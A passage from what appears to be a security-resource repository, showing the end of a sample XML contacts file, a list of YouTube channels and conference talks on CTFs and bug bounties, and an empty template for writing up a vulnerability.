 8 |     <city>Paris</city>
 9 |   </contact>
10 | </contacts>
11 | 


--------------------------------------------------------------------------------
/YOUTUBE.md:
--------------------------------------------------------------------------------
 1 | # Youtube
 2 | 
 3 | ## Channels
 4 | 
 5 | - [IppSec Channel - Hack The Box Writeups](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)
 6 | - [LiveOverflow - Explore weird machines...](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w)
 7 | - [GynvaelEN - Podcasts about CTFs, computer security, programming and similar things.](https://www.youtube.com/channel/UCCkVMojdBWS-JtH7TliWkVg)
 8 | - [John Hammond - Wargames and CTF writeups](https://www.youtube.com/channel/UCVeW9qkBjo3zosnqUbG7CFw)
 9 | - [Murmus CTF - Weekly live streamings](https://www.youtube.com/channel/UCUB9vOGEUpw7IKJRoR4PK-A)
10 | - [PwnFunction](https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A)
11 | - [OJ Reeves](https://www.youtube.com/channel/UCz2aqRQWMhJ4wcJq3XneqRg)
12 | - [Hacksplained - A Beginner Friendly Guide to Hacking](https://www.youtube.com/c/hacksplained)
13 | - [STÖK](https://www.youtube.com/c/STOKfredrik)
14 | - [Defcon](https://www.youtube.com/user/DEFCONConference)
15 | - [Hackersploit](https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q)
16 | - [The Cyber Mentor](https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw)
17 | - [Nahamsec](https://www.youtube.com/c/Nahamsec)
18 | - [Hackerone](https://www.youtube.com/channel/UCsgzmECky2Q9lQMWzDwMhYw)
19 | - [The Hated one](https://www.youtube.com/channel/UCjr2bPAyPV7t35MvcgT3W8Q)
20 | - [stacksmashing / Ghidra Ninja](https://www.youtube.com/channel/UC3S8vxwRfqLBdIhgRlDRVzw)
21 | - [Hak5](https://www.youtube.com/channel/UC3s0BtrBJpwNDaflRSoiieQ)
22 | 
23 | ## Conferences
24 | 
25 | - [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)
26 | - [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc)
27 | - [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8)
28 | - [The Conscience of a Hacker](https://www.youtube.com/watch?v=0tEnnvZbYek)
29 | - [Defcon 2020 Talks](https://www.youtube.com/user/DEFCONConference/videos)
30 | 


--------------------------------------------------------------------------------
/_template_vuln/README.md:
--------------------------------------------------------------------------------
 1 | # Vulnerability Title
 2 | 
 3 | > Vulnerability description - reference
 4 | 
 5 | ## Summary
 6 | 
 7 | - [Tools](#tools)
 8 | * [Something](#something)
 9 |   * [Subentry 1](#sub1)
10 |   * [Subentry 2](#sub2)
11 | 
12 | ## Tools
13 | 
14 | - [Tool 1](https://example.com)
15 | - [Tool 2](https://example.com)
16 | 
17 | ## Something
18 | 
19 | Quick explanation
20 | 
21 | ```powershell
22 | Exploit
23 | ```
24 | 
25 | ## References
26 | 
27 | - [Blog title - Author, Date](https://example.com)


--------------------------------------------------------------------------------